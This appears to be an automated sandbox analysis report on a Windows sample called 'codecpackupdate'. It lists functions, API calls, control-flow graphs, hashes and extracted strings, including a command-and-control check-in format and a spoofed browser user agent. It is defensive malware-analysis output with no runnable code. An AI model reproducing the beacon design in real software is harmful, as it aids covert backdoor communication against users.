                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F642A Relevance: 66.8, APIs: 33, Strings: 5, Instructions: 259memorysleeplibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 471 9f642a-9f6437 472 9f6439-9f6441 471->472 473 9f64b7 471->473 475 9f6443 472->475 476 9f6460-9f6486 472->476 474 9f64b9-9f64e8 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 473->474 481 9f64ef-9f66ed GetTickCount call 9f605a GetVersionExA call a04a30 call a02eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call a04a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call a02eec * 4 QueryPerformanceCounter Sleep call a02eec * 2 call a04a30 * 2 474->481 482 9f64ea call 9f42c7 474->482 478 9f6445-9f6446 475->478 479 9f63f3-9f6409 475->479 478->474 483 9f6448-9f645f 478->483 526 9f66f0-9f66f2 481->526 482->481 483->476 527 9f66fb-9f66fd 526->527 528 9f66f4-9f66f9 526->528 529 9f66ff 527->529 530 9f670a-9f673e RtlEnterCriticalSection RtlLeaveCriticalSection 527->530 531 9f6704 Sleep 528->531 529->531 532 9f678e 530->532 533 9f6740-9f674c 530->533 531->530 535 9f6792-9f72bf InternetOpenA 532->535 533->532 534 9f674e-9f675b 533->534 536 9f675d-9f6761 534->536 537 9f6763-9f6764 534->537 540 9f7385-9f738b 535->540 541 9f72c5-9f733c InternetSetOptionA * 3 call a04a30 InternetOpenUrlA 535->541 539 9f6768-9f678c call a04a30 * 2 536->539 537->539 539->535 542 9f738d-9f7393 540->542 543 9f73a7-9f73b5 540->543 554 9f737e-9f737f InternetCloseHandle 541->554 555 9f733e 541->555 546 9f7399-9f73a6 call 9f53ec 542->546 547 9f7395-9f7397 542->547 543->526 549 9f73bb-9f73df call a04a30 call 9f439c 543->549 546->543 547->543 549->526 564 9f73e5-9f7413 RtlEnterCriticalSection RtlLeaveCriticalSection call a0227c 549->564 554->540 559 9f7342-9f7368 InternetReadFile 555->559 561 9f736a-9f7371 559->561 562 9f7373-9f737a InternetCloseHandle 559->562 561->559 562->554 567 9f7469-9f7484 call a0227c 564->567 568 9f7415-9f7427 call a0227c 564->568 574 9f773e-9f7750 call a0227c 567->574 575 9f748a-9f748c 567->575 568->567 573 9f7429-9f743b call a0227c 568->573 573->567 585 9f743d-9f744f call a0227c 573->585 582 9f7799-9f77ab call a0227c 574->582 583 9f7752-9f7754 574->583 575->574 577 9f7492-9f7544 call a02eec RtlEnterCriticalSection RtlLeaveCriticalSection call a04a30 * 5 call 9f439c * 2 575->577 638 9f7546-9f7548 577->638 639 9f7581 577->639 596 9f77ad-9f77c7 call 9f61f1 call 9f62ff call 9f640a 582->596 597 9f77cc-9f77de call a0227c 582->597 583->582 586 9f7756-9f7794 call a04a30 RtlEnterCriticalSection RtlLeaveCriticalSection 583->586 585->567 598 9f7451-9f7463 call a0227c 585->598 586->526 596->526 607 9f7afc-9f7b0e call a0227c 597->607 608 9f77e4-9f77e6 597->608 598->526 598->567 607->526 619 9f7b14-9f7b42 call a02eec call a04a30 call 9f439c 607->619 608->607 611 9f77ec-9f7803 call 9f439c 608->611 611->526 624 9f7809-9f78d7 call a02358 call 9f1ba7 611->624 644 9f7b4b-9f7b52 call a02eb4 619->644 645 9f7b44-9f7b46 call 9f534d 619->645 641 9f78de-9f78ff RtlEnterCriticalSection 624->641 642 9f78d9 call 9f143f 624->642 638->639 643 9f754a-9f755c call a0227c 638->643 646 9f7585-9f75b3 call a02eec call a04a30 call 9f439c 639->646 648 9f790b-9f796f RtlLeaveCriticalSection call 9f3c67 call 9f3d7e call 9f826e 641->648 649 9f7901-9f7908 641->649 642->641 643->639 660 9f755e-9f757f call 9f439c 643->660 644->526 645->644 670 9f75b5-9f75c4 call a03529 646->670 671 9f75f4-9f75fd call a02eb4 646->671 672 9f7975-9f79bd call 9fa658 648->672 673 9f7ae3-9f7af7 call 9f8f36 648->673 649->648 660->646 670->671 682 9f75c6 670->682 685 9f7734-9f7737 671->685 686 9f7603-9f761b call a03a8f 671->686 683 9f7aad-9f7ade call 9f831d call 9f33b2 672->683 684 9f79c3-9f79ca 672->684 673->526 687 9f75cb-9f75dd call a02790 682->687 683->673 689 9f79cd-9f79d2 684->689 685->574 695 9f761d-9f7625 call 9f966a 686->695 696 9f7627 686->696 702 9f75df 687->702 703 9f75e2-9f75f2 call a03529 687->703 689->689 694 9f79d4-9f7a1f call 9fa658 689->694 694->683 708 9f7a25-9f7a2b 694->708 701 9f7629-9f76e1 call 9fa782 call 9f3863 call 9f5119 call 9f3863 call 9faa28 call 9fab42 695->701 696->701 728 9f76e8-9f7713 Sleep call a01830 701->728 729 9f76e3 call 9f380b 701->729 702->703 703->671 703->687 709 9f7a2e-9f7a33 708->709 709->709 712 9f7a35-9f7a70 call 9fa658 709->712 712->683 718 9f7a72-9f7aac call 9fd04a 712->718 718->683 733 9f771f-9f772d 728->733 734 9f7715-9f771e call 9f4100 728->734 729->728 733->685 736 9f772f call 9f380b 733->736 734->733 736->685
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009F64CD
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64D6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009F64E5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64E8
                                                                          • GetTickCount.KERNEL32 ref: 009F64F4
                                                                          • GetVersionExA.KERNEL32(00A27010), ref: 009F6521
                                                                          • _malloc.LIBCMT ref: 009F654D
                                                                          • _malloc.LIBCMT ref: 009F655D
                                                                          • _malloc.LIBCMT ref: 009F6568
                                                                          • _malloc.LIBCMT ref: 009F6573
                                                                          • _malloc.LIBCMT ref: 009F657E
                                                                          • _malloc.LIBCMT ref: 009F6589
                                                                          • _malloc.LIBCMT ref: 009F6594
                                                                          • _malloc.LIBCMT ref: 009F65A3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009F65BA
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65C3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65D2
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65D5
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65E0
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65E3
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F661D
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F662A
                                                                          • _malloc.LIBCMT ref: 009F664E
                                                                          • _malloc.LIBCMT ref: 009F665C
                                                                          • _malloc.LIBCMT ref: 009F6663
                                                                          • _malloc.LIBCMT ref: 009F6689
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 009F669C
                                                                          • Sleep.KERNELBASE ref: 009F66AA
                                                                          • _malloc.LIBCMT ref: 009F66B6
                                                                          • _malloc.LIBCMT ref: 009F66C3
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$AllocateProcess$AddressEnterHandleLeaveModuleProcSleep$CountCounterPerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                          • API String ID: 2110165542-2678694477
                                                                          • Opcode ID: 96aceb53da585eef51812b98a703e46c32994701699364844a33a1dfed61f96c
                                                                          • Instruction ID: f9a5a549bdb01f5b82df8f2d9b5472552660d8bbe31cef3c1c334c49b0c77952
                                                                          • Opcode Fuzzy Hash: 96aceb53da585eef51812b98a703e46c32994701699364844a33a1dfed61f96c
                                                                          • Instruction Fuzzy Hash: 3C8109B19483549FD310AF74EC09BAFBFE8AF89314F20482EF68497291DB754801CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009F1D11
                                                                          • GetLastError.KERNEL32 ref: 009F1D23
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009F1D59
                                                                          • GetLastError.KERNEL32 ref: 009F1D6B
                                                                          • __beginthreadex.LIBCMT ref: 009F1DB1
                                                                          • GetLastError.KERNEL32 ref: 009F1DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F1DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F1DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009F1E14
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009F1E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 4246062733-3017686385
                                                                          • Opcode ID: ab20c3456c70afcd28ec7c2871ae939dd2cdf691162a2ffe6771a84a600e10b8
                                                                          • Instruction ID: 6095631900d956a76673b94916a06f0cf5a9a65457909418e8f52119532724b4
                                                                          • Opcode Fuzzy Hash: ab20c3456c70afcd28ec7c2871ae939dd2cdf691162a2ffe6771a84a600e10b8
                                                                          • Instruction Fuzzy Hash: C1317C71A043059FD700EF60C848B6FBBB9EB88751F10856DF9599B2A1DB309D4ACBD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F4D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4D8B
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4DB7
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4DC3
                                                                            • Part of subcall function 009F4BED: __EH_prolog.LIBCMT ref: 009F4BF2
                                                                            • Part of subcall function 009F4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 009F4CF2
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4E93
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4E99
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4EA0
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4EA6
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F50A7
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F50AD
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F50B8
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F50C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: ad33e4642f09c3778f35b575ad4b988f006ce0969f9c2d2c8f35f6ed25b26672
                                                                          • Instruction ID: 691e9199e7aebec7e11f05158cc7c229c44f8a3b1c57fe52a105c6bac33486bc
                                                                          • Opcode Fuzzy Hash: ad33e4642f09c3778f35b575ad4b988f006ce0969f9c2d2c8f35f6ed25b26672
                                                                          • Instruction Fuzzy Hash: 90B17B71D0425DDFDF21DFA0C841BEEBBB9AF44314F14805AEA09B6281DB745A49CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 866 401f64-401f84 FindResourceA 867 401f86-401f9d GetLastError SizeofResource 866->867 868 401f9f-401fa1 866->868 867->868 869 401fa6-401fec LoadResource LockResource GlobalAlloc call 402910 * 2 867->869 870 402096-40209a 868->870 875 401fee-401ff9 869->875 875->875 876 401ffb-402003 GetTickCount 875->876 877 402032-402038 876->877 878 402005-402007 876->878 879 402053-402083 GlobalAlloc call 401c26 877->879 881 40203a-40204a 877->881 878->879 880 402009-40200f 878->880 886 402088-402093 879->886 880->879 883 402011-402023 880->883 884 40204c 881->884 885 40204e-402051 881->885 887 402025 883->887 888 402027-40202a 883->888 884->885 885->879 885->881 886->870 887->888 888->883 889 40202c-40202e 888->889 889->880 890 402030 889->890 890->879
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                          • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F26DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 891 9f26db-9f2726 RtlEnterCriticalSection 892 9f277e-9f2781 891->892 893 9f2728-9f2736 CreateWaitableTimerA 891->893 894 9f27d5-9f27f0 RtlLeaveCriticalSection 892->894 895 9f2783-9f2798 call a03a8f 892->895 896 9f275b-9f2778 SetWaitableTimer 893->896 897 9f2738-9f2756 GetLastError call a00a50 call 9f1712 893->897 903 9f27ca 895->903 904 9f279a-9f27ac call a03a8f 895->904 896->892 897->896 905 9f27cc-9f27d0 call 9f7d36 903->905 909 9f27ae-9f27b7 904->909 910 9f27b9 904->910 905->894 911 9f27bb-9f27c3 call 9f1cf8 909->911 910->911 913 9f27c8 911->913 913->905
                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F2706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009F272B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A15A93), ref: 009F2738
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009F2778
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F27D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: e3f0859a34ea27fc398250d1a43331681fe327d99367ff4315a908700cf661a2
                                                                          • Instruction ID: b84edb636d977e918257c67f9abb38d412c366f8bc9ac9996a44153925322b0b
                                                                          • Opcode Fuzzy Hash: e3f0859a34ea27fc398250d1a43331681fe327d99367ff4315a908700cf661a2
                                                                          • Instruction Fuzzy Hash: 7A31A1B1508709EFD310EF65D945B6ABBECFB48765F004A2EF95587680D770E900CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 942 9f2b95-9f2baf 943 9f2bc7-9f2bcb 942->943 944 9f2bb1-9f2bb9 call a00a50 942->944 945 9f2bdf 943->945 946 9f2bcd-9f2bd0 943->946 951 9f2bbf-9f2bc2 944->951 949 9f2be2-9f2c11 WSASetLastError WSARecv call 9fa43c 945->949 946->945 948 9f2bd2-9f2bdd call a00a50 946->948 948->951 956 9f2c16-9f2c1d 949->956 954 9f2d30 951->954 957 9f2d32-9f2d38 954->957 958 9f2c1f-9f2c2a call a00a50 956->958 959 9f2c2c-9f2c32 956->959 970 9f2c3f-9f2c42 958->970 961 9f2c46-9f2c48 959->961 962 9f2c34-9f2c39 call a00a50 959->962 963 9f2c4f-9f2c60 call a00a50 961->963 964 9f2c4a-9f2c4d 961->964 962->970 963->957 968 9f2c66-9f2c69 963->968 964->968 972 9f2c6b-9f2c6d 968->972 973 9f2c73-9f2c76 968->973 970->961 972->973 974 9f2d22-9f2d2d call 9f1996 972->974 973->954 975 9f2c7c-9f2c9a call a00a50 call 9f166f 973->975 974->954 982 9f2cbc-9f2cfa WSASetLastError select call 9fa43c 975->982 983 9f2c9c-9f2cba call a00a50 call 9f166f 975->983 989 9f2cfc-9f2d06 call a00a50 982->989 990 9f2d08 982->990 983->954 983->982 997 9f2d19-9f2d1d 989->997 993 9f2d0a-9f2d12 call a00a50 990->993 994 9f2d15-9f2d17 990->994 993->994 994->954 994->997 997->949
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2BE4
                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 009F2C07
                                                                            • Part of subcall function 009FA43C: WSAGetLastError.WS2_32(00000000,?,?,009F2A51), ref: 009FA44A
                                                                          • WSASetLastError.WS2_32 ref: 009F2CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 009F2CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3'
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: 81cc69d929e7974da876504aa965c954cde680f31e61c0ca81c8f7460cae373e
                                                                          • Instruction ID: 422558ee40ee65e4d103b3d69a44dd8ee41d9b89e20ffd21da74d6a95f9247e7
                                                                          • Opcode Fuzzy Hash: 81cc69d929e7974da876504aa965c954cde680f31e61c0ca81c8f7460cae373e
                                                                          • Instruction Fuzzy Hash: 51417AB1A083098FD710DF64D505BBBBBE8BF84355F20491EFA99C7291EB74D8418B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F29EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1050 9f29ee-9f2a06 1051 9f2a0c-9f2a10 1050->1051 1052 9f2ab3-9f2abb call a00a50 1050->1052 1053 9f2a39-9f2a4c WSASetLastError closesocket call 9fa43c 1051->1053 1054 9f2a12-9f2a15 1051->1054 1061 9f2abe-9f2ac6 1052->1061 1060 9f2a51-9f2a55 1053->1060 1054->1053 1056 9f2a17-9f2a36 call a00a50 call 9f2f50 1054->1056 1056->1053 1060->1052 1063 9f2a57-9f2a5f call a00a50 1060->1063 1068 9f2a69-9f2a71 call a00a50 1063->1068 1069 9f2a61-9f2a67 1063->1069 1074 9f2aaf-9f2ab1 1068->1074 1075 9f2a73-9f2a79 1068->1075 1069->1068 1070 9f2a7b-9f2aad ioctlsocket WSASetLastError closesocket call 9fa43c 1069->1070 1070->1074 1074->1052 1074->1061 1075->1070 1075->1074
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2A3B
                                                                          • closesocket.WS2_32 ref: 009F2A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 009F2A89
                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 009F2A97
                                                                          • closesocket.WS2_32 ref: 009F2A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: bb4104a61ebb8f266a91d3dbea19cef88226777ecdc7dac15cb0eff6d5fe24af
                                                                          • Instruction ID: 472100aab4398ee66d5bb8d820b33896c3d3d4a18655c0e2c3ae93cf8813c2fb
                                                                          • Opcode Fuzzy Hash: bb4104a61ebb8f266a91d3dbea19cef88226777ecdc7dac15cb0eff6d5fe24af
                                                                          • Instruction Fuzzy Hash: 7021D3B1A00309ABDB20EBF89948BBE76FCAF44311F148569FA15C32D1EA74CD468751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1077 9f1ba7-9f1bcf call a15330 RtlEnterCriticalSection 1080 9f1be9-9f1bf7 RtlLeaveCriticalSection call 9fe263 1077->1080 1081 9f1bd1 1077->1081 1084 9f1bfa-9f1c20 RtlEnterCriticalSection 1080->1084 1082 9f1bd4-9f1be0 call 9f1b79 1081->1082 1089 9f1c55-9f1c6e RtlLeaveCriticalSection 1082->1089 1090 9f1be2-9f1be7 1082->1090 1086 9f1c34-9f1c36 1084->1086 1087 9f1c38-9f1c43 1086->1087 1088 9f1c22-9f1c2f call 9f1b79 1086->1088 1091 9f1c45-9f1c4b 1087->1091 1088->1091 1095 9f1c31 1088->1095 1090->1080 1090->1082 1091->1089 1094 9f1c4d-9f1c51 1091->1094 1094->1089 1095->1086
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F1BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: 631e10ef4b574c148a691b8012db53d7877dad497fd25a765f37b73962238e1a
                                                                          • Instruction ID: 39b5e59477aa92a014f172dbc65c8c39e428941af4eb3036536de2b596acd233
                                                                          • Opcode Fuzzy Hash: 631e10ef4b574c148a691b8012db53d7877dad497fd25a765f37b73962238e1a
                                                                          • Instruction Fuzzy Hash: C321AB75A04219DFCB14CF68C8447AABBB8FF98310F118189E95597301D774ED01CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402F22 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                          • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009F2EFD
                                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009F2F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009F2F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: 51e4c58dcd5e3bb2a1401454d71bb132e276c85d39f1414771666e7a59f39a6c
                                                                          • Instruction ID: 00757c2d8695c277468882762cb1e6074c32a18212ab9bfee66fa42583186575
                                                                          • Opcode Fuzzy Hash: 51e4c58dcd5e3bb2a1401454d71bb132e276c85d39f1414771666e7a59f39a6c
                                                                          • Instruction Fuzzy Hash: BB017571611208BBDB209FA5DC49FDA7BBDEB89761F008565FA18CB191D6748C018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

